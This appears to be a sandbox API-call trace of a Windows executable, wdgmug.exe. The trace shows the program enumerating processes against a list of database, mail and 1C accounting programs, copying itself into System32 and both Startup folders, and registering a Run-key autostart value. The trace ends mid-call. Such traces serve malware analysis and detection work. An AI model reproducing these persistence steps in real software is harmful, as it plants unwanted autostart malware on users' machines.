[0156.751] lstrcmpiW (lpString1="outlook.exe", lpString2="DeviceCensus.exe") returned 1 [0156.751] lstrcmpiW (lpString1="postgres.exe", lpString2="DeviceCensus.exe") returned 1 [0156.751] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="DeviceCensus.exe") returned 1 [0156.751] lstrcmpiW (lpString1="mysqld.exe", lpString2="DeviceCensus.exe") returned 1 [0156.751] lstrcmpiW (lpString1="sqlservr.exe", lpString2="DeviceCensus.exe") returned 1 [0156.751] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0156.752] lstrlenW (lpString="conhost.exe") returned 11 [0156.752] lstrcmpiW (lpString1="1c8.exe", lpString2="conhost.exe") returned -1 [0156.752] lstrcmpiW (lpString1="1cv77.exe", lpString2="conhost.exe") returned -1 [0156.752] lstrcmpiW (lpString1="outlook.exe", lpString2="conhost.exe") returned 1 [0156.752] lstrcmpiW (lpString1="postgres.exe", lpString2="conhost.exe") returned 1 [0156.752] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="conhost.exe") returned 1 [0156.752] lstrcmpiW (lpString1="mysqld.exe", lpString2="conhost.exe") returned 1 [0156.752] lstrcmpiW (lpString1="sqlservr.exe", lpString2="conhost.exe") returned 1 [0156.752] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0156.753] lstrlenW (lpString="sppsvc.exe") returned 10 [0156.753] lstrcmpiW (lpString1="1c8.exe", lpString2="sppsvc.exe") returned -1 [0156.753] lstrcmpiW (lpString1="1cv77.exe", lpString2="sppsvc.exe") returned -1 [0156.753] lstrcmpiW (lpString1="outlook.exe", lpString2="sppsvc.exe") returned -1 [0156.753] lstrcmpiW (lpString1="postgres.exe", lpString2="sppsvc.exe") returned -1 [0156.754] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0156.754] lstrlenW (lpString="dllhost.exe") returned 11 [0156.754] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0156.756] lstrlenW (lpString="dllhost.exe") returned 11 [0156.756] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0156.757] lstrlenW (lpString="dllhost.exe") returned 11 [0156.757] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0156.757] lstrlenW (lpString="wdgmug.exe") returned 10 [0156.757] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 0 [0156.758] CloseHandle (hObject=0x240) returned 1 [0156.758] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72a660 | out: hHeap=0x710000) returned 1 [0156.758] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72a150 | out: hHeap=0x710000) returned 1 [0156.758] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7256b0 | out: hHeap=0x710000) returned 1 [0156.758] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725590 | out: hHeap=0x710000) returned 1 [0156.758] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x726228 | out: hHeap=0x710000) returned 1 [0156.758] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755318 | out: hHeap=0x710000) returned 1 [0156.758] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7257f0 | out: hHeap=0x710000) returned 1 [0156.759] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725510 | out: hHeap=0x710000) returned 1 [0156.759] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ea70 | out: hHeap=0x710000) returned 1 [0156.759] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ec00 | out: hHeap=0x710000) returned 1 [0156.759] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725530 | out: hHeap=0x710000) returned 1 [0156.759] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e9f8 | out: hHeap=0x710000) returned 1 [0156.759] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x757700 [0156.759] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x767708 [0156.760] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755288 [0156.760] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755288, Size=0x20) returned 0x74e7f0 [0156.760] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e7f0, Size=0x40) returned 0x72a6f0 [0156.760] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755360 [0156.760] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755360, Size=0x20) returned 0x74eb60 [0156.760] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7553f0 [0156.760] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7553f0, Size=0x20) returned 0x74ec00 [0156.760] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755420 [0156.760] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755420, Size=0x20) returned 0x74ec28 [0156.760] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74ec28, Size=0x40) returned 0x72a540 [0156.760] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x767708, nSize=0x7fff | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\wdgmug.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\wdgmug.exe")) returned 0x22 [0156.760] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x777710 [0156.761] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x787718 [0156.761] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755378 [0156.761] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755378, Size=0x20) returned 0x74e9a8 [0156.761] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e9a8, Size=0x40) returned 0x72a150 [0156.761] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a150, Size=0x80) returned 0x754af0 [0156.761] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754af0, Size=0x100) returned 0x755f40 [0156.761] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0156.761] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755f40 | out: hHeap=0x710000) returned 1 [0156.761] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\wdgmug.exe", lpDst=0x777710, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\System32\\wdgmug.exe") returned 0x1f [0156.762] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x787718 | out: hHeap=0x710000) returned 1 [0156.762] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x777710 | out: hHeap=0x710000) returned 1 [0156.763] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x23f8020 [0156.766] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7553d8 [0156.766] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7553d8, Size=0x20) returned 0x74e7c8 [0156.766] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755180 [0156.766] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755180, Size=0x20) returned 0x74ec78 [0156.766] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0156.767] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0156.767] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x0) returned 1 [0156.767] lstrlenW (lpString="kernel32.dll") returned 12 [0156.767] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e7c8 | out: hHeap=0x710000) returned 1 [0156.767] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0156.767] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ec78 | out: hHeap=0x710000) returned 1 [0156.767] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\wdgmug.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\wdgmug.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0156.767] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\wdgmug.exe" (normalized: "c:\\windows\\system32\\wdgmug.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0156.772] ReadFile (in: hFile=0x240, lpBuffer=0x23f8020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x23f8020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0156.819] WriteFile (in: hFile=0x244, lpBuffer=0x23f8020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x23f8020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0156.822] ReadFile (in: hFile=0x240, lpBuffer=0x23f8020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x23f8020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0156.823] CloseHandle (hObject=0x244) returned 1 [0156.828] CloseHandle (hObject=0x240) returned 1 [0156.828] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755408 [0156.828] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755408, Size=0x20) returned 0x74ea20 [0156.829] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755378 [0156.829] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755378, Size=0x20) returned 0x74e9a8 [0156.829] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0156.829] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0156.829] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0156.829] lstrlenW (lpString="kernel32.dll") returned 12 [0156.829] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e9a8 | out: hHeap=0x710000) returned 1 [0156.829] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0156.829] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ea20 | out: hHeap=0x710000) returned 1 [0156.829] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x23f8020 | out: hHeap=0x710000) returned 1 [0156.851] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7551b0 [0156.851] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7551b0, Size=0x20) returned 0x74e7f0 [0156.851] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e7f0, Size=0x40) returned 0x72a738 [0156.851] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a738, Size=0x80) returned 0x7547c0 [0156.851] lstrlenW (lpString="C:\\WINDOWS\\System32\\wdgmug.exe") returned 30 [0156.851] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0156.851] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x5c) returned 0x727cb0 [0156.851] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x19fd64 | out: phkResult=0x19fd64*=0x240) returned 0x0 [0156.851] RegSetValueExW (in: hKey=0x240, lpValueName="wdgmug.exe", Reserved=0x0, dwType=0x1, lpData="C:\\WINDOWS\\System32\\wdgmug.exe", cbData=0x3c | out: lpData="C:\\WINDOWS\\System32\\wdgmug.exe") returned 0x0 [0156.852] RegCloseKey (hKey=0x240) returned 0x0 [0156.852] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x727cb0 | out: hHeap=0x710000) returned 1 [0156.852] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0156.853] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7547c0 | out: hHeap=0x710000) returned 1 [0156.853] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x777710 [0156.853] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x787718 [0156.853] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7551b0 [0156.853] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7551b0, Size=0x20) returned 0x74e930 [0156.853] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e930, Size=0x40) returned 0x72a420 [0156.853] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a420, Size=0x80) returned 0x754c00 [0156.854] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754c00, Size=0x100) returned 0x755f40 [0156.854] lstrlenW (lpString="") returned 0 [0156.854] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0156.854] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8c) returned 0x756048 [0156.854] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x240) returned 0x0 [0156.854] RegQueryValueExW (in: hKey=0x240, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x787718, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x0, lpData=0x787718*=0x53, lpcbData=0x19fd48*=0x7fff) returned 0x2 [0156.854] RegCloseKey (hKey=0x240) returned 0x0 [0156.854] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x756048 | out: hHeap=0x710000) returned 1 [0156.854] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0156.854] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8c) returned 0x756048 [0156.854] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0156.855] RegQueryValueExW (in: hKey=0x244, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x787718, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x98) returned 0x0 [0156.855] RegCloseKey (hKey=0x244) returned 0x0 [0156.855] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x756048 | out: hHeap=0x710000) returned 1 [0156.855] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0156.855] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0156.855] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755f40 | out: hHeap=0x710000) returned 1 [0156.855] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe", lpDst=0x777710, nSize=0x7fff | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe") returned 0x59 [0156.855] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x787718 | out: hHeap=0x710000) returned 1 [0156.856] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x777710 | out: hHeap=0x710000) returned 1 [0156.857] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x23f9020 [0156.861] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755300 [0156.861] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755300, Size=0x20) returned 0x74e930 [0156.861] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755198 [0156.862] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755198, Size=0x20) returned 0x74ebd8 [0156.862] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0156.862] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0156.862] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0156.862] lstrlenW (lpString="kernel32.dll") returned 12 [0156.862] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e930 | out: hHeap=0x710000) returned 1 [0156.862] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0156.862] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ebd8 | out: hHeap=0x710000) returned 1 [0156.862] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\wdgmug.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\wdgmug.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0156.862] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0156.875] ReadFile (in: hFile=0x244, lpBuffer=0x23f9020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x23f9020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0156.891] WriteFile (in: hFile=0x248, lpBuffer=0x23f9020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x23f9020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0156.956] ReadFile (in: hFile=0x244, lpBuffer=0x23f9020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x23f9020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0156.968] CloseHandle (hObject=0x248) returned 1 [0157.147] CloseHandle (hObject=0x244) returned 1 [0157.147] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7553a8 [0157.147] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7553a8, Size=0x20) returned 0x74ec28 [0157.147] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755198 [0157.147] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755198, Size=0x20) returned 0x74e9f8 [0157.148] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0157.148] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0157.148] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0157.148] lstrlenW (lpString="kernel32.dll") returned 12 [0157.148] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e9f8 | out: hHeap=0x710000) returned 1 [0157.148] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0157.149] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ec28 | out: hHeap=0x710000) returned 1 [0157.149] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x23f9020 | out: hHeap=0x710000) returned 1 [0157.155] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x777710 [0157.156] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x787718 [0157.156] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755390 [0157.156] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755390, Size=0x20) returned 0x74e9d0 [0157.156] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e9d0, Size=0x40) returned 0x72a588 [0157.156] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a588, Size=0x80) returned 0x7546b0 [0157.156] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7546b0, Size=0x100) returned 0x755f40 [0157.156] lstrlenW (lpString="") returned 0 [0157.156] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0157.156] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8c) returned 0x756048 [0157.156] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0157.156] RegQueryValueExW (in: hKey=0x244, lpValueName="Common Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x787718, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x78) returned 0x0 [0157.156] RegCloseKey (hKey=0x244) returned 0x0 [0157.156] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x756048 | out: hHeap=0x710000) returned 1 [0157.156] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0157.157] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0157.157] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755f40 | out: hHeap=0x710000) returned 1 [0157.157] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe", lpDst=0x777710, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe") returned 0x48 [0157.157] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x787718 | out: hHeap=0x710000) returned 1 [0157.157] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x777710 | out: hHeap=0x710000) returned 1 [0157.158] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x23fb020 [0157.162] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755300 [0157.162] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755300, Size=0x20) returned 0x74e7f0 [0157.162] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755288 [0157.162] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755288, Size=0x20) returned 0x74ea70 [0157.162] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0157.162] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0157.162] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0157.162] lstrlenW (lpString="kernel32.dll") returned 12 [0157.162] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e7f0 | out: hHeap=0x710000) returned 1 [0157.162] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0157.162] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ea70 | out: hHeap=0x710000) returned 1 [0157.162] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\wdgmug.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\wdgmug.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0157.163] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0157.165] ReadFile (in: hFile=0x244, lpBuffer=0x23fb020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x23fb020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0157.235] WriteFile (in: hFile=0x248, lpBuffer=0x23fb020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x23fb020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0157.238] ReadFile (in: hFile=0x244, lpBuffer=0x23fb020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x23fb020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0157.238] CloseHandle (hObject=0x248) returned 1 [0157.290] CloseHandle (hObject=0x244) returned 1 [0157.290] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755300 [0157.290] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755300, Size=0x20) returned 0x74eb10 [0157.290] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755408 [0157.290] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755408, Size=0x20) returned 0x74e9a8 [0157.291] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0157.291] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0157.291] 